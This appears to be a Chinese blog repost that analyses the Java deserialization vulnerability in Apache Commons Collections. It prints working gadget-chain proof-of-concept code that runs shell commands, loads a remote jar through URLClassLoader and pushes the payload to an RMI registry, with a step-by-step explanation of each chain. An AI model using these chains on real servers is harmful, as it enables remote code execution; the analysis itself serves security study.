首页

当前位置：网站首页 > 技术资源 > 正文

Java反序列化漏洞详解

lipiwang 2025-05-26 17:14 10 浏览 0 评论

Java反序列化漏洞从爆出到现在快2个月了，已有白帽子实现了jenkins，weblogic，jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后，并对于Java反序列化的Poc进行详细解读。

Java反序列化漏洞简介

Java序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中，Java中的ObjectOutputStream类的writeObject()方法可以实现序列化。
Java反序列化即逆过程，由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。

因此要利用Java反序列化漏洞，需要在进行反序列化的地方传入攻击者的序列化代码。能符合以上条件的地方即存在漏洞。

Java反序列化Poc详解

12345678910111213141516171819202122232425262728293031323334353637383940

publicclasstest{publicstaticvoidmain(String[]args)throwsException{String[]execArgs=newString[]{"sh","-c","whoami > /tmp/fuck"};Transformer[]transformers=newTransformer[]{newConstantTransformer(Runtime.class),newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,null}),newInvokerTransformer("exec",newClass[]{String[].class},newObject[]{execArgs})};Transformer transformedChain=newChainedTransformer(transformers);Map<String,String>BeforeTransformerMap=newHashMap<String,String>();BeforeTransformerMap.put("hello","manning");Map AfterTransformerMap=TransformedMap.decorate(BeforeTransformerMap,null,transformedChain);Classcl=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor ctor=cl.getDeclaredConstructor(Class.class,Map.class);ctor.setAccessible(true);Objectinstance=ctor.newInstance(Target.class,AfterTransformerMap);Filef=newFile("temp.bin");ObjectOutputStream out=newObjectOutputStream(newFileOutputStream(f));out.writeObject(instance);}}

如果想彻底理解上面的poc，需要明白Java中的一些概念。

在Apache commons工具包中有很多jar包（jar包可以理解为python的库），具体jar包里面含有的内容，如下图所示。

其中Java反序列化的问题出在
org.apache.commons.collections这个库里面。
org.apache.commons.collections提供一个类包来扩展和增加标准的Java的collection框架，也就是说这些扩展也属于collection的基本概念，只是功能不同罢了。Java中的collection可以理解为一组对象，collection里面的对象称为collection的对象。具象的collection为set，list，queue等等。换一种理解方式，collection是set，list，queue的抽象，collection中文含义是收集的意思，那么收集的具体方式就可以是set，list，queue了。

在
org.apache.commons.collections内提供了一个接口类叫Transformer，这个接口的英文定义为

Defines a functor interface implemented by classes that transform one object into another.

也就是说接口于Transformer的类都具备把一个对象转化为另一个对象的功能。目前已知接口于Transformer的类，如下如所示。

图上带箭头指示的为Java反序列化漏洞的poc含有的类。

ConstantTransformer
Transformer implementation that returns the same constant each time. （把一个对象转化为常量，并返回）
InvokerTransformer
Transformer implementation that creates a new object instance by reflection. （通过反射，返回一个对象）
ChainedTransformer
Transformer implementation that chains the specified transformers together. （把一些transformer链接到一起，构成一组链条，对一个对象依次通过链条内的每一个transformer进行转换）

有了以上的相关概念，就可以理解最开始的poc了。poc里面，我们一共创建了以下关键对象。

execArgs
待执行的命令数组
transformers
一个transformer链，包含预设转化逻辑（各类transformer对象）的转化数组
transformedChain
ChainedTransformer类对象，传入transformers数组，可以按照transformers数组的逻辑执行转化操作
BeforeTransformerMap
Map数据结构，转换前的Map，Map数据结构内的对象是键值对形式，类比于python的dict理解即可
AfterTransformerMap
Map数据结构，转换后的Map

整个poc的逻辑可以这么理解，构建了BeforeTransformerMap的键值对，为其赋值，利用TransformedMap的decorate方法，可以对Map数据结构的key，value进行transforme。

TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数。第一个参数为待转化的Map对象，第二个参数为Map对象内的key要经过的转化方法（可为单个方法，也可为链，也可为空），第三个参数为Map对象内的value要经过的转化方法。

TransformedMap.decorate(目标Map, key的转化对象（单个或者链或者null）, value的转化对象（单个或者链或者null）);

上图是调试时的转换变量内容，可以很清楚地看到执行完poc后，已经对Map的value进行了转换（过了一遍transformer链）。

poc中对BeforeTransformerMap的value进行转换，当BeforeTransformerMap的value执行完一个完整转换链，就完成了命令执行。

在进行反序列化时，我们会调用ObjectInputStream类的readObject()方法。如果被反序列化的类重写了readObject()，那么该类在进行反序列化时，Java会优先调用重写的readObject()方法。

结合前述Commons Collections的特性，如果某个可序列化的类重写了readObject()方法，并且在readObject()中对Map类型的变量进行了键值修改操作，并且这个Map变量是可控的，就可以实现我们的攻击目标了。

因此我们在poc中看见了下行的代码。

Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

这个类完全符合我们的要求，具体解释可以查看TSRC的文章。

如果要实现一个可控的poc，需要对transformer链的构造进行理解。首先来看InvokerTransformer。

InvokerTransformer(String methodName, Class[] paramTypes, Object[] args)

12	InvokerTransformer(StringmethodName,Class[]paramTypes,Object[]args)

参数依次为：方法名称，参数类型，参数对象我们找其中一个来看下。

12345678910111213141516

newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"getRuntime",newClass[0]}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,null}),newInvokerTransformer("exec",newClass[]{String.class},newObject[]{"gedit"})

参数类型里面的内容完全对应于参数对象里的内容。

PS：由于Method类的invoke(Object obj,Object args[])方法的定义，所以在反射内写new Class[] {Object.class, Object[].class }。

所以正常流程如下所示：

((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");

基于报错的反序列化transformer链

1234567891011121314151617181920212223242526272829

Transformer[]transformers=newTransformer[]{newConstantTransformer(Java.net.URLClassLoader.class),newInvokerTransformer("getConstructor",newClass[]{Class[].class},newObject[]{newClass[]{Java.net.URL[].class}}),newInvokerTransformer("newInstance",newClass[]{Object[].class},newObject[]{newObject[]{newJava.net.URL[]{newJava.net.URL(url)}}}),newInvokerTransformer("loadClass",newClass[]{String.class},newObject[]{"ErrorBaseExec"}),newInvokerTransformer("getMethod",newClass[]{String.class,Class[].class},newObject[]{"do_exec",newClass[]{String.class}}),newInvokerTransformer("invoke",newClass[]{Object.class,Object[].class},newObject[]{null,newString[]{cmd}})};

有了先前的理解，这个链就很明了了。先建立一个读取远程jar文件的类 URLClassLoader，实例化这个类，传入要访问的url，再读取远程加载类，接着获取类方法，然后反射这个方法。

关于RMI利用的相关内容

tang3已经在RMI利用文章讲过怎么利用了，这段内容，我只是详解下给出的poc的原理。

poc部分内容

123456789101112131415161718192021222324

Transformer transformedChain=newChainedTransformer(transformers);Map BeforeTransformerMap=newHashMap();innerMap.put("value","value");Map AfterTransformerMap=TransformedMap.decorate(BeforeTransformerMap,null,transformedChain);Classcl=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor ctor=cl.getDeclaredConstructor(Class.class,Map.class);ctor.setAccessible(true);Objectinstance=ctor.newInstance(Target.class,AfterTransformerMap);InvocationHandlerh=(InvocationHandler)instance;Remoter=Remote.class.cast(Proxy.newProxyInstance(Remote.class.getClassLoader(),newClass[]{Remote.class},h));try{Registry registry=LocateRegistry.getRegistry(ip,port);registry.rebind("",r);// r is remote obj}catch(Throwablee){e.printStackTrace();}

RMI利用的poc看上去还是很熟悉的，因为到建立instance时，还和之前的内容一致。之后便到了RMI内容独有的细节，从代码角度可以看出利用逻辑为：

建立实例对象instance
实例对象instance 转化为 InvocationHandler类型的句柄h（因为instance是序列化后的内容，所以instance就是一串数据）
把句柄h附载到Remote类实例 r上
向远程服务器注册，得到远程注册对象 registry
向远程注册对象registry注册 实例r

在Java的RMI中，我们允许向远程已运行的jvm虚拟环境中绑定（rebind函数，也可以理解为添加）一些实例对象，通过RMI协议传输一些序列化好的内容，这样服务端解析（也就是反序列化）传过来的数据后，便可把解析后的内容添加到运行环境中。构造remote类型实例r 方法很多，poc中利用动态代理创建remote实例r是方法之一。

因此涉及RMI的代码也会存在Java反序列化漏洞。

漏洞影响分析

Java反序列化漏洞从爆出到现在快2个月了。最开始的只能命令执行和反弹shell，到后来的有回显的命令执行，到最终的代码执行，利用上来是越来越方便（有回显的命令执行和代码执行均为利用远程jar文件的利用形式）。从微博来看，已有白帽子实现了jenkins，weblogic，jboss等的代码执行利用工具。待最终利用工具公布，此漏洞还会有一个上升趋势的影响。

资料引用

http://blog.chaitin.com/2015-11-11_java_unserialize_rce/
http://security.tencent.com/index.php/blog/msg/97
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
http://www.infoq.com/cn/articles/cf-java-object-serialization-rmi
http://blog.nsfocus.net/learning-guide-java-serialization-de-serialization-vulnerability-remediation/
http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/

如果您需要了解更多内容，可以

加入QQ群：486207500

java序列化与反序列化

Java反序列化漏洞详解

相关推荐

取消回复欢迎你发表评论:

深圳尚学堂Java面试习题集(六)

MySQL 日期操作函数大全:解锁时间处理的奥秘

Android 工程师必知必会的“AOP知识”

SpringBoot-24-默认Json框架jackson详解

工作3年出去面试Java，被鄙视spring的接口有哪些都不清楚

互联网应用高并发中间件:RabbitMQ的安装和配置

SQLMAP注入参数-其他参数介绍 sqlmap怎么对一个注入点注入

JavaScript:如何优雅的创建数组?

JavaScript代码怎样引入到HTML中?

魔兽世界TBC怀旧服:风暴要塞王子一键救人宏，简单又实用

Java反序列化漏洞详解

相关推荐

取消回复欢迎 你 发表评论:

深圳尚学堂Java面试习题集(六)

MySQL 日期操作函数大全:解锁时间处理的奥秘

Android 工程师必知必会的“AOP知识”

SpringBoot-24-默认Json框架jackson详解

工作3年出去面试Java，被鄙视spring的接口有哪些都不清楚

互联网应用高并发中间件:RabbitMQ的安装和配置

SQLMAP注入参数-其他参数介绍 sqlmap怎么对一个注入点注入

JavaScript:如何优雅的创建数组?

JavaScript代码怎样引入到HTML中?

魔兽世界TBC怀旧服:风暴要塞王子一键救人宏，简单又实用

取消回复欢迎你发表评论: